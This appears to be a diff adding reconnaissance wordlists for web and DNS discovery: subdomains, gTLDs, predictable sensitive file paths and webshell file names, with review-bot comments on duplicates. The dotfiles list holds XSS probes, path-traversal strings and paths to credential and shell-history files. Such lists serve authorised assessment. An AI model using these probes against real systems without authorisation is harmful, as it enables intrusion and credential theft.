hs
|
||||
ht
|
||||
hu
|
||||
hv
|
||||
hw
|
||||
hx
|
||||
hy
|
||||
hypernova
|
||||
hz
|
||||
i
|
||||
ia
|
||||
ib
|
||||
ic
|
||||
id
|
||||
ie
|
||||
if
|
||||
ig
|
||||
ih
|
||||
ii
|
||||
ij
|
||||
ik
|
||||
il
|
||||
im
|
||||
images
|
||||
imail
|
||||
imap
|
||||
imap3
|
||||
imap3d
|
||||
imapd
|
||||
imaps
|
||||
imgs
|
||||
imogen
|
||||
in
|
||||
inmuebles
|
||||
internal
|
||||
interno
|
||||
intranet
|
||||
io
|
||||
ip
|
||||
ip6
|
||||
ipsec
|
||||
ipv6
|
||||
iq
|
||||
ir
|
||||
irc
|
||||
ircd
|
||||
is
|
||||
isa
|
||||
it
|
||||
iu
|
||||
iv
|
||||
iw
|
||||
ix
|
||||
iy
|
||||
iz
|
||||
j
|
||||
ja
|
||||
jabber
|
||||
jb
|
||||
jc
|
||||
jd
|
||||
je
|
||||
jf
|
||||
jg
|
||||
jh
|
||||
ji
|
||||
jj
|
||||
jk
|
||||
jl
|
||||
jm
|
||||
jn
|
||||
jo
|
||||
jp
|
||||
jq
|
||||
jr
|
||||
js
|
||||
jt
|
||||
ju
|
||||
jupiter
|
||||
jv
|
||||
jw
|
||||
jx
|
||||
jy
|
||||
jz
|
||||
k
|
||||
ka
|
||||
kb
|
||||
kc
|
||||
kd
|
||||
ke
|
||||
kf
|
||||
kg
|
||||
kh
|
||||
ki
|
||||
kj
|
||||
kk
|
||||
kl
|
||||
km
|
||||
kn
|
||||
ko
|
||||
kp
|
||||
kq
|
||||
kr
|
||||
ks
|
||||
kt
|
||||
ku
|
||||
kv
|
||||
kw
|
||||
kx
|
||||
ky
|
||||
kz
|
||||
l
|
||||
la
|
||||
lab
|
||||
laboratories
|
||||
laboratorio
|
||||
laboratory
|
||||
labs
|
||||
lb
|
||||
lc
|
||||
ld
|
||||
le
|
||||
lf
|
||||
lg
|
||||
lh
|
||||
li
|
||||
library
|
||||
linux
|
||||
lisa
|
||||
lj
|
||||
lk
|
||||
ll
|
||||
lm
|
||||
ln
|
||||
lo
|
||||
localhost
|
||||
log
|
||||
login
|
||||
logon
|
||||
logs
|
||||
lp
|
||||
lq
|
||||
lr
|
||||
ls
|
||||
lt
|
||||
lu
|
||||
lv
|
||||
lw
|
||||
lx
|
||||
ly
|
||||
lz
|
||||
m
|
||||
ma
|
||||
mail
|
||||
mailgate
|
||||
manager
|
||||
marketing
|
||||
mb
|
||||
mc
|
||||
md
|
||||
me
|
||||
media
|
||||
member
|
||||
members
|
||||
mercury
|
||||
meta
|
||||
meta01
|
||||
meta02
|
||||
meta03
|
||||
meta1
|
||||
meta2
|
||||
meta3
|
||||
mf
|
||||
mg
|
||||
mh
|
||||
mi
|
||||
miembros
|
||||
minerva
|
||||
mj
|
||||
mk
|
||||
ml
|
||||
mm
|
||||
mn
|
||||
mo
|
||||
mob
|
||||
mobile
|
||||
moodle
|
||||
movil
|
||||
mp
|
||||
mq
|
||||
mr
|
||||
ms
|
||||
mssql
|
||||
mt
|
||||
mu
|
||||
mv
|
||||
mw
|
||||
mx
|
||||
mx0
|
||||
mx01
|
||||
mx02
|
||||
mx03
|
||||
mx1
|
||||
mx2
|
||||
mx3
|
||||
my
|
||||
mysql
|
||||
mz
|
||||
n
|
||||
na
|
||||
nb
|
||||
nc
|
||||
nd
|
||||
ne
|
||||
nelson
|
||||
neon
|
||||
net
|
||||
netmail
|
||||
news
|
||||
nf
|
||||
ng
|
||||
nh
|
||||
ni
|
||||
nj
|
||||
nk
|
||||
nl
|
||||
nm
|
||||
nn
|
||||
no
|
||||
novell
|
||||
np
|
||||
nq
|
||||
nr
|
||||
ns
|
||||
ns0
|
||||
ns01
|
||||
ns02
|
||||
ns03
|
||||
ns1
|
||||
ns2
|
||||
ns3
|
||||
nt
|
||||
ntp
|
||||
nu
|
||||
nv
|
||||
nw
|
||||
nx
|
||||
ny
|
||||
nz
|
||||
o
|
||||
oa
|
||||
ob
|
||||
oc
|
||||
od
|
||||
oe
|
||||
of
|
||||
og
|
||||
oh
|
||||
oi
|
||||
oj
|
||||
ok
|
||||
ol
|
||||
om
|
||||
on
|
||||
online
|
||||
oo
|
||||
op
|
||||
oq
|
||||
or
|
||||
ora
|
||||
oracle
|
||||
os
|
||||
osx
|
||||
ot
|
||||
ou
|
||||
ov
|
||||
ow
|
||||
owa
|
||||
ox
|
||||
oy
|
||||
oz
|
||||
p
|
||||
pa
|
||||
partners
|
||||
pb
|
||||
pc
|
||||
pcanywhere
|
||||
pd
|
||||
pe
|
||||
pegasus
|
||||
pendrell
|
||||
personal
|
||||
pf
|
||||
pg
|
||||
ph
|
||||
photo
|
||||
photos
|
||||
pi
|
||||
pj
|
||||
pk
|
||||
pl
|
||||
pm
|
||||
pn
|
||||
po
|
||||
pop
|
||||
pop3
|
||||
portal
|
||||
postgresql
|
||||
postman
|
||||
postmaster
|
||||
pp
|
||||
ppp
|
||||
pq
|
||||
pr
|
||||
preprod
|
||||
pre-prod
|
||||
private
|
||||
prod
|
||||
proxy
|
||||
prueba
|
||||
pruebas
|
||||
ps
|
||||
pt
|
||||
pu
|
||||
pub
|
||||
public
|
||||
pv
|
||||
pw
|
||||
px
|
||||
py
|
||||
pz
|
||||
q
|
||||
qa
|
||||
qb
|
||||
qc
|
||||
qd
|
||||
qe
|
||||
qf
|
||||
qg
|
||||
qh
|
||||
qi
|
||||
qj
|
||||
qk
|
||||
ql
|
||||
qm
|
||||
qn
|
||||
qo
|
||||
qp
|
||||
qq
|
||||
qr
|
||||
qs
|
||||
qt
|
||||
qu
|
||||
qv
|
||||
qw
|
||||
qx
|
||||
qy
|
||||
qz
|
||||
r
|
||||
ra
|
||||
ras
|
||||
rb
|
||||
rc
|
||||
rd
|
||||
re
|
||||
remote
|
||||
reports
|
||||
research
|
||||
restricted
|
||||
rf
|
||||
rg
|
||||
rh
|
||||
ri
|
||||
rj
|
||||
rk
|
||||
rl
|
||||
rm
|
||||
rn
|
||||
ro
|
||||
robinhood
|
||||
router
|
||||
rp
|
||||
rq
|
||||
rr
|
||||
rs
|
||||
rt
|
||||
rtr
|
||||
ru
|
||||
rv
|
||||
rw
|
||||
rx
|
||||
ry
|
||||
rz
|
||||
s
|
||||
sa
|
||||
sales
|
||||
sample
|
||||
samples
|
||||
sandbox
|
||||
sb
|
||||
sc
|
||||
sd
|
||||
se
|
||||
search
|
||||
secure
|
||||
seguro
|
||||
server
|
||||
services
|
||||
servicios
|
||||
servidor
|
||||
sf
|
||||
sg
|
||||
sh
|
||||
sharepoint
|
||||
shop
|
||||
shopping
|
||||
si
|
||||
sj
|
||||
sk
|
||||
sl
|
||||
sm
|
||||
sms
|
||||
smtp
|
||||
sn
|
||||
so
|
||||
socios
|
||||
solaris
|
||||
soporte
|
||||
sp
|
||||
sq
|
||||
sql
|
||||
squirrel
|
||||
squirrelmail
|
||||
sr
|
||||
ss
|
||||
ssh
|
||||
st
|
||||
staff
|
||||
staging
|
||||
stats
|
||||
su
|
||||
sun
|
||||
support
|
||||
sv
|
||||
sw
|
||||
sx
|
||||
sy
|
||||
sz
|
||||
t
|
||||
ta
|
||||
tb
|
||||
tc
|
||||
td
|
||||
te
|
||||
test
|
||||
tf
|
||||
tftp
|
||||
tg
|
||||
th
|
||||
ti
|
||||
tienda
|
||||
tj
|
||||
tk
|
||||
tl
|
||||
tm
|
||||
tn
|
||||
to
|
||||
tp
|
||||
tq
|
||||
tr
|
||||
ts
|
||||
tt
|
||||
tu
|
||||
tunnel
|
||||
tv
|
||||
tw
|
||||
tx
|
||||
ty
|
||||
tz
|
||||
u
|
||||
ua
|
||||
uat
|
||||
ub
|
||||
uc
|
||||
ud
|
||||
ue
|
||||
uf
|
||||
ug
|
||||
uh
|
||||
ui
|
||||
uj
|
||||
uk
|
||||
ul
|
||||
um
|
||||
un
|
||||
unix
|
||||
uo
|
||||
up
|
||||
upload
|
||||
uploads
|
||||
uq
|
||||
ur
|
||||
us
|
||||
ut
|
||||
uu
|
||||
uv
|
||||
uw
|
||||
ux
|
||||
uy
|
||||
uz
|
||||
v
|
||||
va
|
||||
vb
|
||||
vc
|
||||
vd
|
||||
ve
|
||||
ventas
|
||||
vf
|
||||
vg
|
||||
vh
|
||||
vi
|
||||
virtual
|
||||
vista
|
||||
vj
|
||||
vk
|
||||
vl
|
||||
vm
|
||||
vn
|
||||
vnc
|
||||
vo
|
||||
vp
|
||||
vpn
|
||||
vpn1
|
||||
vpn2
|
||||
vpn3
|
||||
vq
|
||||
vr
|
||||
vs
|
||||
vt
|
||||
vu
|
||||
vv
|
||||
vw
|
||||
vx
|
||||
vy
|
||||
vz
|
||||
w
|
||||
wa
|
||||
wap
|
||||
wb
|
||||
wc
|
||||
wd
|
||||
we
|
||||
web
|
||||
web0
|
||||
web01
|
||||
web02
|
||||
web03
|
||||
web1
|
||||
web2
|
||||
web3
|
||||
webadmin
|
||||
webct
|
||||
weblog
|
||||
webmail
|
||||
webmaster
|
||||
webmin
|
||||
wf
|
||||
wg
|
||||
wh
|
||||
wi
|
||||
win
|
||||
windows
|
||||
wj
|
||||
wk
|
||||
wl
|
||||
wm
|
||||
wn
|
||||
wo
|
||||
wp
|
||||
wq
|
||||
wr
|
||||
ws
|
||||
wt
|
||||
wu
|
||||
wv
|
||||
ww
|
||||
ww0
|
||||
ww01
|
||||
ww02
|
||||
ww03
|
||||
ww1
|
||||
ww2
|
||||
ww3
|
||||
www
|
||||
www0
|
||||
www01
|
||||
www02
|
||||
www03
|
||||
www1
|
||||
www2
|
||||
www3
|
||||
wx
|
||||
wy
|
||||
wz
|
||||
x
|
||||
xa
|
||||
xanthus
|
||||
xb
|
||||
xc
|
||||
xd
|
||||
xe
|
||||
xf
|
||||
xg
|
||||
xh
|
||||
xi
|
||||
xj
|
||||
xk
|
||||
xl
|
||||
xm
|
||||
xn
|
||||
xo
|
||||
xp
|
||||
xq
|
||||
xr
|
||||
xs
|
||||
xt
|
||||
xu
|
||||
xv
|
||||
xw
|
||||
xx
|
||||
xy
|
||||
xz
|
||||
y
|
||||
ya
|
||||
yb
|
||||
yc
|
||||
yd
|
||||
ye
|
||||
yf
|
||||
yg
|
||||
yh
|
||||
yi
|
||||
yj
|
||||
yk
|
||||
yl
|
||||
ym
|
||||
yn
|
||||
yo
|
||||
yp
|
||||
yq
|
||||
yr
|
||||
ys
|
||||
yt
|
||||
yu
|
||||
yv
|
||||
yw
|
||||
yx
|
||||
yy
|
||||
yz
|
||||
z
|
||||
za
|
||||
zb
|
||||
zc
|
||||
zd
|
||||
ze
|
||||
zeus
|
||||
zf
|
||||
zg
|
||||
zh
|
||||
zi
|
||||
zj
|
||||
zk
|
||||
zl
|
||||
zm
|
||||
zn
|
||||
zo
|
||||
zp
|
||||
zq
|
||||
zr
|
||||
zs
|
||||
zt
|
||||
zu
|
||||
zv
|
||||
zw
|
||||
zx
|
||||
zy
|
||||
zz
|
784
discovery/dns/gTLD.txt
Normal file
|
@ -0,0 +1,784 @@
|
|||
한국
|
||||
테스트
|
||||
ABB
|
||||
ABBOTT
|
||||
ABOGADO
|
||||
academy
|
||||
ACCENTURE
|
||||
ACCOUNTANT
|
||||
accountants
|
||||
ACCOUNTANTS
|
||||
ACTIVE
|
||||
actor
|
||||
ADS
|
||||
ADULT
|
||||
aero
|
||||
AFL
|
||||
agency
|
||||
AIG
|
||||
airforce
|
||||
AIRFORCE
|
||||
ALLFINANZ
|
||||
ALSACE
|
||||
AMSTERDAM
|
||||
ANDROID
|
||||
APARTMENTS
|
||||
AQUARELLE
|
||||
archi
|
||||
ARMY
|
||||
arpa
|
||||
asia
|
||||
associates
|
||||
ASSOCIATES
|
||||
ATTORNEY
|
||||
AUCTION
|
||||
audio
|
||||
AUDIO
|
||||
AUTO
|
||||
AUTOS
|
||||
axa
|
||||
BAND
|
||||
BANK
|
||||
bar
|
||||
BARCLAYCARD
|
||||
BARCLAYS
|
||||
bargains
|
||||
BAUHAUS
|
||||
bayern
|
||||
BAYERN
|
||||
BBC
|
||||
BBVA
|
||||
beer
|
||||
BEER
|
||||
berlin
|
||||
best
|
||||
BIBLE
|
||||
bid
|
||||
bike
|
||||
BINGO
|
||||
BIO
|
||||
biz
|
||||
black
|
||||
blackfriday
|
||||
BLACKFRIDAY
|
||||
BLOOMBERG
|
||||
blue
|
||||
BMW
|
||||
BNPPARIBAS
|
||||
BOATS
|
||||
BOND
|
||||
BOO
|
||||
boutique
|
||||
BRIDGESTONE
|
||||
BROKER
|
||||
BROTHER
|
||||
BRUSSELS
|
||||
BUDAPEST
|
||||
build
|
||||
builders
|
||||
BUSINESS
|
||||
buzz
|
||||
BZH
|
||||
cab
|
||||
CAFE
|
||||
CAL
|
||||
camera
|
||||
camp
|
||||
CANCERRESEARCH
|
||||
CANON
|
||||
CAPETOWN
|
||||
capital
|
||||
CAPITAL
|
||||
CARAVAN
|
||||
cards
|
||||
care
|
||||
CARE
|
||||
career
|
||||
CAREER
|
||||
careers
|
||||
CARS
|
||||
CARTIER
|
||||
CASA
|
||||
cash
|
||||
CASH
|
||||
CASINO
|
||||
cat
|
||||
catering
|
||||
CBN
|
||||
center
|
||||
ceo
|
||||
CERN
|
||||
CFA
|
||||
CFD
|
||||
CHANNEL
|
||||
CHAT
|
||||
cheap
|
||||
CHLOE
|
||||
christmas
|
||||
CHROME
|
||||
church
|
||||
CHURCH
|
||||
CISCO
|
||||
citic
|
||||
CITIC
|
||||
CITY
|
||||
claims
|
||||
CLAIMS
|
||||
cleaning
|
||||
CLICK
|
||||
clinic
|
||||
CLINIC
|
||||
clothing
|
||||
club
|
||||
COACH
|
||||
codes
|
||||
coffee
|
||||
college
|
||||
COLLEGE
|
||||
cologne
|
||||
com
|
||||
community
|
||||
company
|
||||
computer
|
||||
construction
|
||||
CONSULTING
|
||||
contractors
|
||||
cooking
|
||||
cool
|
||||
coop
|
||||
CORSICA
|
||||
country
|
||||
COUPONS
|
||||
COURSES
|
||||
credit
|
||||
CREDIT
|
||||
creditcard
|
||||
CREDITCARD
|
||||
CRICKET
|
||||
CRS
|
||||
cruises
|
||||
CUISINELLA
|
||||
CYMRU
|
||||
CYOU
|
||||
DABUR
|
||||
DAD
|
||||
dance
|
||||
DATE
|
||||
dating
|
||||
DATSUN
|
||||
DAY
|
||||
DCLK
|
||||
DEALS
|
||||
DEGREE
|
||||
DELIVERY
|
||||
democrat
|
||||
dental
|
||||
DENTAL
|
||||
DENTIST
|
||||
desi
|
||||
DESI
|
||||
DESIGN
|
||||
DEV
|
||||
diamonds
|
||||
DIET
|
||||
digital
|
||||
DIGITAL
|
||||
DIRECT
|
||||
directory
|
||||
discount
|
||||
DISCOUNT
|
||||
DOCS
|
||||
DOG
|
||||
DOHA
|
||||
domains
|
||||
DOOSAN
|
||||
DOWNLOAD
|
||||
DURBAN
|
||||
DVAG
|
||||
EARTH
|
||||
EAT
|
||||
edu
|
||||
education
|
||||
email
|
||||
EMERCK
|
||||
ENERGY
|
||||
ENGINEER
|
||||
engineering
|
||||
ENGINEERING
|
||||
enterprises
|
||||
EPSON
|
||||
equipment
|
||||
ERNI
|
||||
ESQ
|
||||
estate
|
||||
EUROVISION
|
||||
eus
|
||||
EUS
|
||||
events
|
||||
EVERBANK
|
||||
exchange
|
||||
EXCHANGE
|
||||
expert
|
||||
exposed
|
||||
EXPRESS
|
||||
fail
|
||||
FAIL
|
||||
FAITH
|
||||
FAN
|
||||
FANS
|
||||
farm
|
||||
FASHION
|
||||
feedback
|
||||
FEEDBACK
|
||||
FILM
|
||||
finance
|
||||
FINANCE
|
||||
financial
|
||||
FINANCIAL
|
||||
FIRMDALE
|
||||
fish
|
||||
fishing
|
||||
FIT
|
||||
fitness
|
||||
FITNESS
|
||||
flights
|
||||
florist
|
||||
FLOWERS
|
||||
FLSMIDTH
|
||||
FLY
|
||||
foo
|
||||
FOO
|
||||
FOOTBALL
|
||||
FOREX
|
||||
FORSALE
|
||||
foundation
|
||||
FRL
|
||||
frogans
|
||||
FROGANS
|
||||
fund
|
||||
FUND
|
||||
furniture
|
||||
FURNITURE
|
||||
futbol
|
||||
FYI
|
||||
gal
|
||||
GAL
|
||||
gallery
|
||||
GARDEN
|
||||
GBIZ
|
||||
GDN
|
||||
GENT
|
||||
GGEE
|
||||
gift
|
||||
GIFTS
|
||||
GIVES
|
||||
glass
|
||||
GLE
|
||||
GLOBAL
|
||||
globo
|
||||
GLOBO
|
||||
GMAIL
|
||||
gmo
|
||||
GMO
|
||||
GMX
|
||||
GOLD
|
||||
GOLDPOINT
|
||||
GOLF
|
||||
GOO
|
||||
GOOG
|
||||
GOOGLE
|
||||
gop
|
||||
GOP
|
||||
gov
|
||||
graphics
|
||||
gratis
|
||||
GRATIS
|
||||
GREEN
|
||||
gripe
|
||||
GRIPE
|
||||
GUGE
|
||||
guide
|
||||
GUIDE
|
||||
guitars
|
||||
guru
|
||||
HAMBURG
|
||||
HANGOUT
|
||||
haus
|
||||
HEALTHCARE
|
||||
HELP
|
||||
HERE
|
||||
HERMES
|
||||
hiphop
|
||||
HIPHOP
|
||||
HITACHI
|
||||
HIV
|
||||
HOCKEY
|
||||
holdings
|
||||
holiday
|
||||
HOMEDEPOT
|
||||
HOMES
|
||||
HONDA
|
||||
horse
|
||||
HOST
|
||||
HOSTING
|
||||
house
|
||||
HOW
|
||||
IBM
|
||||
ICBC
|
||||
ICU
|
||||
IFM
|
||||
IMMO
|
||||
immobilien
|
||||
industries
|
||||
INFINITI
|
||||
info
|
||||
ING
|
||||
institute
|
||||
insure
|
||||
INSURE
|
||||
int
|
||||
international
|
||||
investments
|
||||
INVESTMENTS
|
||||
IRISH
|
||||
IWC
|
||||
JAVA
|
||||
JCB
|
||||
jetzt
|
||||
JEWELRY
|
||||
JLL
|
||||
jobs
|
||||
JOBURG
|
||||
juegos
|
||||
JUEGOS
|
||||
kaufen
|
||||
KDDI
|
||||
kim
|
||||
kitchen
|
||||
kiwi
|
||||
koeln
|
||||
KOMATSU
|
||||
KRD
|
||||
kred
|
||||
KYOTO
|
||||
LACAIXA
|
||||
land
|
||||
LAT
|
||||
LATROBE
|
||||
LAWYER
|
||||
LDS
|
||||
lease
|
||||
LEASE
|
||||
LECLERC
|
||||
LEGAL
|
||||
LGBT
|
||||
LIAISON
|
||||
LIDL
|
||||
life
|
||||
LIFE
|
||||
lighting
|
||||
limited
|
||||
LIMITED
|
||||
limo
|
||||
link
|
||||
LOAN
|
||||
loans
|
||||
LOANS
|
||||
LOL
|
||||
london
|
||||
LOTTE
|
||||
LOTTO
|
||||
LOVE
|
||||
LTDA
|
||||
LUPIN
|
||||
luxe
|
||||
LUXE
|
||||
luxury
|
||||
MADRID
|
||||
MAIF
|
||||
management
|
||||
mango
|
||||
MARKET
|
||||
marketing
|
||||
MARKETS
|
||||
MARRIOTT
|
||||
MBA
|
||||
media
|
||||
MEDIA
|
||||
meet
|
||||
MELBOURNE
|
||||
MEME
|
||||
MEMORIAL
|
||||
MEN
|
||||
menu
|
||||
miami
|
||||
mil
|
||||
MINI
|
||||
MMA
|
||||
mobi
|
||||
moda
|
||||
moe
|
||||
monash
|
||||
MONEY
|
||||
MORMON
|
||||
MORTGAGE
|
||||
moscow
|
||||
MOSCOW
|
||||
MOTORCYCLES
|
||||
MOV
|
||||
MOVIE
|
||||
MTN
|
||||
MTPC
|
||||
museum
|
||||
NADEX
|
||||
nagoya
|
||||
name
|
||||
NAVY
|
||||
NEC
|
||||
net
|
||||
NETWORK
|
||||
neustar
|
||||
NEW
|
||||
NEWS
|
||||
NEXUS
|
||||
NGO
|
||||
NHK
|
||||
NICO
|
||||
ninja
|
||||
NISSAN
|
||||
NRA
|
||||
NRW
|
||||
NTT
|
||||
nyc
|
||||
okinawa
|
||||
ONE
|
||||
ONG
|
||||
onl
|
||||
ONLINE
|
||||
OOO
|
||||
ORACLE
|
||||
org
|
||||
ORGANIC
|
||||
OSAKA
|
||||
OTSUKA
|
||||
OVH
|
||||
PAGE
|
||||
PANERAI
|
||||
paris
|
||||
PARIS
|
||||
partners
|
||||
parts
|
||||
PARTY
|
||||
PHARMACY
|
||||
PHILIPS
|
||||
photo
|
||||
photography
|
||||
photos
|
||||
PHYSIO
|
||||
PIAGET
|
||||
pics
|
||||
PICTET
|
||||
pictures
|
||||
PICTURES
|
||||
pink
|
||||
PIZZA
|
||||
PLACE
|
||||
plumbing
|
||||
PLUS
|
||||
POHL
|
||||
POKER
|
||||
PORN
|
||||
post
|
||||
PRAXI
|
||||
PRESS
|
||||
pro
|
||||
PROD
|
||||
productions
|
||||
PROF
|
||||
properties
|
||||
PROPERTY
|
||||
pub
|
||||
qpon
|
||||
quebec
|
||||
QUEBEC
|
||||
RACING
|
||||
REALTOR
|
||||
recipes
|
||||
red
|
||||
REDSTONE
|
||||
REHAB
|
||||
REISE
|
||||
reisen
|
||||
REISEN
|
||||
REIT
|
||||
ren
|
||||
RENT
|
||||
rentals
|
||||
repair
|
||||
report
|
||||
REPUBLICAN
|
||||
rest
|
||||
REST
|
||||
RESTAURANT
|
||||
REVIEW
|
||||
reviews
|
||||
rich
|
||||
RIO
|
||||
RIP
|
||||
rocks
|
||||
ROCKS
|
||||
rodeo
|
||||
RSVP
|
||||
ruhr
|
||||
RUN
|
||||
ryukyu
|
||||
RYUKYU
|
||||
saarland
|
||||
SAARLAND
|
||||
SALE
|
||||
SAMSUNG
|
||||
SANDVIK
|
||||
SANDVIKCOROMANT
|
||||
SAP
|
||||
SARL
|
||||
SAXO
|
||||
SCA
|
||||
SCB
|
||||
SCHMIDT
|
||||
SCHOLARSHIPS
|
||||
SCHOOL
|
||||
schule
|
||||
SCHULE
|
||||
SCHWARZ
|
||||
SCIENCE
|
||||
SCOT
|
||||
SEAT
|
||||
SENER
|
||||
services
|
||||
SERVICES
|
||||
SEW
|
||||
SEX
|
||||
sexy
|
||||
shiksha
|
||||
shoes
|
||||
SHOW
|
||||
SHRIRAM
|
||||
singles
|
||||
SITE
|
||||
SKI
|
||||
SKY
|
||||
SOCCER
|
||||
social
|
||||
SOFTWARE
|
||||
sohu
|
||||
solar
|
||||
solutions
|
||||
SONY
|
||||
soy
|
||||
SOY
|
||||
SPACE
|
||||
SPIEGEL
|
||||
SPREADBETTING
|
||||
STUDY
|
||||
STYLE
|
||||
SUCKS
|
||||
supplies
|
||||
supply
|
||||
support
|
||||
SURF
|
||||
surgery
|
||||
SURGERY
|
||||
SUZUKI
|
||||
SWISS
|
||||
SYDNEY
|
||||
systems
|
||||
TAIPEI
|
||||
TATAR
|
||||
tattoo
|
||||
tax
|
||||
TAX
|
||||
TAXI
|
||||
TEAM
|
||||
TECH
|
||||
technology
|
||||
tel
|
||||
TEMASEK
|
||||
TENNIS
|
||||
THD
|
||||
THEATER
|
||||
TICKETS
|
||||
tienda
|
||||
tips
|
||||
TIRES
|
||||
TIROL
|
||||
today
|
||||
tokyo
|
||||
tools
|
||||
TOP
|
||||
TORAY
|
||||
TOSHIBA
|
||||
TOURS
|
||||
town
|
||||
TOWN
|
||||
toys
|
||||
TOYS
|
||||
trade
|
||||
TRADING
|
||||
training
|
||||
travel
|
||||
TRUST
|
||||
TUI
|
||||
university
|
||||
UNIVERSITY
|
||||
uno
|
||||
UOL
|
||||
vacations
|
||||
vegas
|
||||
ventures
|
||||
vermögensberater
|
||||
vermögensberatung
|
||||
VERSICHERUNG
|
||||
VET
|
||||
viajes
|
||||
VIDEO
|
||||
villas
|
||||
vision
|
||||
VLAANDEREN
|
||||
vodka
|
||||
vote
|
||||
voting
|
||||
voto
|
||||
voyage
|
||||
WALES
|
||||
WALTER
|
||||
wang
|
||||
watch
|
||||
webcam
|
||||
WEBSITE
|
||||
wed
|
||||
WEDDING
|
||||
WEIR
|
||||
WHOSWHO
|
||||
wien
|
||||
wiki
|
||||
WILLIAMHILL
|
||||
WIN
|
||||
WME
|
||||
WORK
|
||||
works
|
||||
WORLD
|
||||
wtc
|
||||
WTC
|
||||
wtf
|
||||
WTF
|
||||
XBOX
|
||||
XEROX
|
||||
XIN
|
||||
xn--30rr7y
|
||||
xn--45q11c
|
||||
xn--9et52u
|
||||
xn--b4w605ferd
|
||||
xn--czrs0t
|
||||
xn--estv75g
|
||||
xn--fjq720a
|
||||
xn--flw351e
|
||||
xn--hxt814e
|
||||
xn--imr513n
|
||||
xn--kcrx77d1x4a
|
||||
xn--mgbpl2fh
|
||||
xn--mxtq1m
|
||||
xn--nyqy26a
|
||||
xn--qcka1pmc
|
||||
xn--vuq861b
|
||||
xn--y9a3aq
|
||||
xxx
|
||||
xyz
|
||||
YACHTS
|
||||
YANDEX
|
||||
YODOBASHI
|
||||
YOGA
|
||||
yokohama
|
||||
YOKOHAMA
|
||||
YOUTUBE
|
||||
ZIP
|
||||
zone
|
||||
ZUERICH
|
||||
إختبار
|
||||
ایران
|
||||
آزمایشی
|
||||
الاردن
|
||||
الجزائر
|
||||
السعودية
|
||||
المغرب
|
||||
امارات
|
||||
بھارت
|
||||
بازار
|
||||
پاکستان
|
||||
تونس
|
||||
سودان
|
||||
سورية
|
||||
شبكة
|
||||
عمان
|
||||
فلسطين
|
||||
قطر
|
||||
مصر
|
||||
مليسيا
|
||||
موقع
|
||||
טעסט
|
||||
δοκιμή
|
||||
дети
|
||||
испытание
|
||||
қаз
|
||||
мкд
|
||||
мон
|
||||
москва
|
||||
онлайн
|
||||
орг
|
||||
рус
|
||||
рф
|
||||
сайт
|
||||
срб
|
||||
укр
|
||||
გე
|
||||
परीक्षा
|
||||
भारत
|
||||
संगठन
|
||||
ભારત
|
||||
భారత్
|
||||
ਭਾਰਤ
|
||||
இந்தியா
|
||||
இலங்கை
|
||||
சிங்கப்பூர்
|
||||
பரிட்சை
|
||||
বাংলা
|
||||
ভারত
|
||||
ලංකා
|
||||
世界
|
||||
中信
|
||||
中国
|
||||
中國
|
||||
中文网
|
||||
企业
|
||||
佛山
|
||||
公司
|
||||
公益
|
||||
台湾
|
||||
台灣
|
||||
商城
|
||||
商标
|
||||
在线
|
||||
广东
|
||||
我爱你
|
||||
手机
|
||||
政务
|
||||
新加坡
|
||||
机构
|
||||
测试
|
||||
測試
|
||||
游戏
|
||||
移动
|
||||
组织机构
|
||||
网址
|
||||
网络
|
||||
集团
|
||||
香港
|
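Review bot: Many labels in this list appear twice, differing only in case (`accountants`/`ACCOUNTANTS`, `airforce`/`AIRFORCE`, `audio`/`AUDIO`, `wtf`/`WTF`), and DNS names compare case-insensitively, so each pair resolves to the same query. Normalising to lower case and de-duplicating would shrink the list without losing coverage. The file also mixes Unicode labels (`中国`, `рф`) with `xn--` A-labels, so a consumer that does not IDNA-encode its input will presumably mishandle the Unicode entries; storing one form only would avoid that. Several of the Unicode entries are country-code IDNs rather than gTLDs, which the file name does not suggest.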
2346
discovery/predictable-filepaths/KitchensinkDirectories.txt
Normal file
File diff suppressed because it is too large
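--- a/discovery/predictable-filepaths/Randomfiles.txt
+++ b/discovery/predictable-filepaths/Randomfiles.txt
@@ -0,0 +1,24 @@
+/accounts.txt
+/culeadora.txt
+/data.txt
+/database.txt
+/grabbed.html
+/info.txt
+/l0gs.txt
+/log.txt
+/logins.txt
+/logs.txt
+/members.txt
+/pass.txt
+/passes.txt
+/password.html
+/password.txt
+/passwords.html
+/passwords.txt
+/pazz.txt
+/pazzezs.txt
+/pw.txt
+/pws.txt
+/technico.txt
+/usernames.txt
+/users.txt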
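--- a/discovery/predictable-filepaths/UnixDotfiles.txt
+++ b/discovery/predictable-filepaths/UnixDotfiles.txt
@@ -0,0 +1,51 @@
+/.DS_Store
+/.FBCIndex
+/.access
+/.addressbook
+/.bash_history
+/.bashrc
+/.cobalt
+/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
+/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
+/.cobalt/sysManage/../admin/.htaccess
+/.fhp
+/.forward
+/.history
+/.htaccess
+/.htaccess.old
+/.htaccess.save
+/.htaccess~
+/.htpasswd
+/.lynx_cookies
+/.mysql_history
+/.nsconfig
+/.nsf/../winnt/win.ini
+/.passwd
+/.perf
+/.pinerc
+/.plan
+/.proclog
+/.procmailrc
+/.profile
+/.psql_history
+/.rhosts
+/.sh_history
+/.ssh
+/.ssh/authorized_keys
+/.ssh/known_hosts
+/.www_acl
+/.wwwacl
+/.access
+/.cobalt
+/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
+/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
+/.fhp
+/.htaccess
+/.htaccess.old
+/.htaccess.save
+/.htaccess~
+/.htpasswd
+/.nsconfig
+/.passwd
+/.www_acl
+/.wwwacl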
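Review bot: Of the last fourteen entries, from the second `/.access` through the second `/.wwwacl`, twelve repeat paths already listed earlier in the file. The other two are the `/.cobalt/alert/service.cgi` probes again with only the alert string changed from `'Vulnerable'` to `'XSS'`, so they test the same reflection. A scanner reading the list line by line therefore sends those requests twice. De-duplicating the file (for example with `sort -u`) and keeping one variant of each probe preserves coverage while reducing request volume and the log noise produced during an authorised assessment.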
|
@ -0,0 +1,29 @@
|
|||
3fexe.asp
|
||||
ASpy.asp
|
||||
EFSO.asp
|
||||
RemExp.asp
|
||||
aspxSH.asp
|
||||
aspxshell.aspx
|
||||
aspydrv.asp
|
||||
cmd.asp
|
||||
cmd.aspx
|
||||
cmdexec.aspx
|
||||
elmaliseker.asp
|
||||
filesystembrowser.aspx
|
||||
fileupload.aspx
|
||||
ntdaddy.asp
|
||||
spexec.aspx
|
||||
sql.aspx
|
||||
tool.asp
|
||||
tool.aspx
|
||||
toolaspshell.asp
|
||||
up.asp
|
||||
up.aspx
|
||||
zehir.asp
